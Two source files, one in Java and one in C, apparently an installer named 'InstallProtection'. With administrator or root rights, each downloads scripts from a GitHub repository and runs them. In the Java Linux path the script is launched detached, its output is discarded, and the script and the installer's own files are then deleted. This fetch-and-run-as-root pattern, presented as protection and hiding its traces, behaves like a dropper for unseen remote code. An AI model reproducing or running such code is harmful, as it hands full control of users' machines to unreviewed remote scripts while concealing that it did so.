File: light/InstallProtection.java
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.Arrays;
import java.util.List;
import java.util.ArrayList;
import java.io.File;
import java.io.IOException;

public class InstallProtection {
    public static void main(String[] args) {
        String os = System.getProperty("os.name").toLowerCase();

        if (os.contains("win")) {
            WindowsInstall();
        } else if (os.contains("nix") || os.contains("nux") || os.contains("mac")) {
            LinuxInstall();
        } else {
            System.out.println("Unsupported operating system: " + os);
        }
    }

    private static void WindowsInstall() {
        if (!isRunningAsAdmin()) {
            System.out.println("This script must be run as an administrator.");
            System.exit(1);
        }

        List<String> commands = Arrays.asList(
            "set-executionpolicy remotesigned -Scope Process -Force",
            "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/NeronNymus/protection/refs/heads/main/light/add_public.ps1' -OutFile '$env:TEMP\\add_public.ps1'",
            "& '$env:TEMP\\add_public.ps1'"
        );

        for (String command : commands) {
            String output = Execute(command);
            if (output == null) {
                break;
            }
            System.out.println();
            System.out.println(output);
        }
    }

    private static boolean isRunningAsAdmin() {
        try {
            Process process = new ProcessBuilder("cmd.exe", "/c", "net session").start();
            process.waitFor();
            return process.exitValue() == 0;
        } catch (Exception e) {
            return false;
        }
    }

	private static void LinuxInstall() {
		if (!isRunningAsSudo()) {
			System.out.println("This script must be run with sudo.");
			System.exit(1);
		}

		String packageManager = detectPackageManager();
		if (packageManager == null) {
			System.out.println("Unsupported Linux distribution. Install curl and Python manually.");
			System.exit(1);
		}

		List<String> installCommands = switch (packageManager) {
			case "apt" -> Arrays.asList("apt-get update -y", "apt-get install -y sudo curl wget");
			case "pacman" -> Arrays.asList("pacman -Sy --noconfirm curl wget");
			case "yum" -> Arrays.asList("yum install -y curl wget");
			default -> List.of();
		};

		// 1) run installers synchronously
		for (String cmd : installCommands) {
			String out = Execute(cmd);    // your existing synchronous Execute()
			if (out == null) {
				System.err.println("Failed running: " + cmd);
				return;
			}
			System.out.println(out);
		}

		// use absolute path for the downloaded script
		String scriptPath = "/tmp/add_public_dynamic.sh";
		String url = "https://raw.githubusercontent.com/NeronNymus/protection/refs/heads/main/light/add_public_dynamic.sh";

		// 2) download script (synchronous)
		String curlCmd = "curl -fsSL -o " + scriptPath + " " + url;
		String curlOut = Execute(curlCmd);
		if (curlOut == null) {
			System.err.println("Download failed: " + curlCmd);
			return;
		}

		// 3) make it executable
		String chmodCmd = "chmod +x " + scriptPath;
		if (Execute(chmodCmd) == null) {
			System.err.println("chmod failed for " + scriptPath);
			// continue — maybe still executable
		}

		// 4) start detached with nohup (do NOT wait)
		String nohupCmd = String.format("nohup /bin/bash %s >/dev/null 2>&1 &", scriptPath);
		String detachedResult = ExecuteDetached(nohupCmd);
		if (detachedResult == null) {
			System.err.println("Failed to start detached script.");
			// we still try cleanup below
		} else {
			System.out.println("Launched detached script.");
		}

		// small pause to let background script start and maybe create files
		try { Thread.sleep(300); } catch (InterruptedException ignored) {}

		// 5) cleanup transient files (synchronous)
		// remove compiled/temporary files if they exist
		String rmCmd = "rm -f /tmp/InstallProtection.class /tmp/InstallProtection.java " + scriptPath;
		if (Execute(rmCmd) == null) {
			System.err.println("Cleanup failed: " + rmCmd);
		} else {
			System.out.println("Cleanup completed.");
		}
	}

	public static String ExecuteDetached(String command) {
		try {
			// run through shell so redirections and & work
			ProcessBuilder pb = new ProcessBuilder("/bin/sh", "-c", command);
			// discard output/errors so the child won't inherit streams
			pb.redirectOutput(ProcessBuilder.Redirect.DISCARD);
			pb.redirectError(ProcessBuilder.Redirect.DISCARD);
			pb.redirectInput(ProcessBuilder.Redirect.PIPE); // child's stdin closed later

			Process p = pb.start();

			// very important: close parent's handles so they aren't kept open
			try { p.getInputStream().close(); } catch (IOException ignored) {}
			try { p.getOutputStream().close(); } catch (IOException ignored) {}
			try { p.getErrorStream().close(); } catch (IOException ignored) {}

			// Do NOT waitFor() — return immediately
			return "detached";
		} catch (Exception e) {
			e.printStackTrace();
			return null;
		}
	}


	private static String detectPackageManager() {
		List<String> managers = Arrays.asList("apt", "pacman", "yum");
		for (String manager : managers) {
			if (new File("/usr/bin/" + manager).exists() || new File("/bin/" + manager).exists()) {
				return manager;
			}
		}
		return null;
	}

    private static boolean isRunningAsSudo() {
        try {
            String userName = System.getProperty("user.name");
            return "root".equals(userName);
        } catch (Exception e) {
            return false;
        }
    }

    public static String Execute(String command) {
        StringBuilder output = new StringBuilder();
        try {
            String[] commandArray = command.split(" ");
            ProcessBuilder processBuilder = new ProcessBuilder(commandArray);
            processBuilder.redirectErrorStream(true);
            Process process = processBuilder.start();

            BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
            String line;
            boolean firstLine = true;
            while ((line = reader.readLine()) != null) {
                if (!firstLine) {
                    output.append(System.lineSeparator());
                }
                output.append(line);
                firstLine = false;
            }

            process.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
        return output.toString();
    }
}

File: light/install_protection.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
    #include <windows.h>
#else
    #include <unistd.h>
    #include <sys/types.h>
#endif

int is_running_as_admin();
void windows_install();
void linux_install();
char* execute(const char* command);

int main() {
#ifdef _WIN32
    windows_install();
#else
    linux_install();
#endif
    return 0;
}

int is_running_as_admin() {
#ifdef _WIN32
    BOOL isAdmin = FALSE;
    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
    PSID AdministratorsGroup;
    if (AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, 
        DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &AdministratorsGroup)) {
        CheckTokenMembership(NULL, AdministratorsGroup, &isAdmin);
        FreeSid(AdministratorsGroup);
    }
    return isAdmin;
#else
    return geteuid() == 0;
#endif
}

void windows_install() {
    if (!is_running_as_admin()) {
        printf("This script must be run as an administrator.\n");
        exit(1);
    }
    
    const char* commands[] = {
        "powershell -Command \"Set-ExecutionPolicy RemoteSigned\"",
        "powershell -Command \"Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/NeronNymus/protection/refs/heads/main/light/install_protection.ps1' -OutFile $env:TEMP\\install_protection.ps1\"",
        "powershell -Command \"& $env:TEMP\\install_protection.ps1\""
    };
    
    for (int i = 0; i < 3; i++) {
        char* output = execute(commands[i]);
        if (output) {
            printf("%s\n", output);
            free(output);
        } else {
            break;
        }
    }
}

void linux_install() {
    if (!is_running_as_admin()) {
        printf("This script must be run with sudo.\n");
        exit(1);
    }
    
    const char* check_apt = "command -v apt";
    const char* check_pacman = "command -v pacman";
    const char* check_yum = "command -v yum";
    const char* install_command = NULL;
    
    if (system(check_apt) == 0) {
        install_command = "sudo apt install curl python3 python3-pip python3-venv -y";
    } else if (system(check_pacman) == 0) {
        install_command = "sudo pacman -Sy --noconfirm curl python python-pip";
    } else if (system(check_yum) == 0) {
        install_command = "sudo yum install -y curl python3 python3-pip";
    } else {
        printf("Unsupported package manager.\n");
        exit(1);
    }
    
    const char* commands[] = {
        install_command,
        "curl -O https://raw.githubusercontent.com/NeronNymus/protection/refs/heads/main/light/install_protection.py",
        "sudo python3 install_protection.py"
    };
    
    for (int i = 0; i < 3; i++) {
        char* output = execute(commands[i]);
        if (output) {
            printf("%s\n", output);
            free(output);
        } else {
            break;
        }
    }
}

char* execute(const char* command) {
    FILE* fp;
    char buffer[128];
    size_t output_size = 1;
    char* output = malloc(output_size);
    if (!output) return NULL;
    output[0] = '\0';
    
    fp = popen(command, "r");
    if (fp == NULL) {
        free(output);
        return NULL;
    }
    
    while (fgets(buffer, sizeof(buffer), fp) != NULL) {
        size_t buffer_len = strlen(buffer);
        char* temp = realloc(output, output_size + buffer_len);
        if (!temp) {
            free(output);
            pclose(fp);
            return NULL;
        }
        output = temp;
        strcpy(output + output_size - 1, buffer);
        output_size += buffer_len;
    }
    
    pclose(fp);
    return output;
}

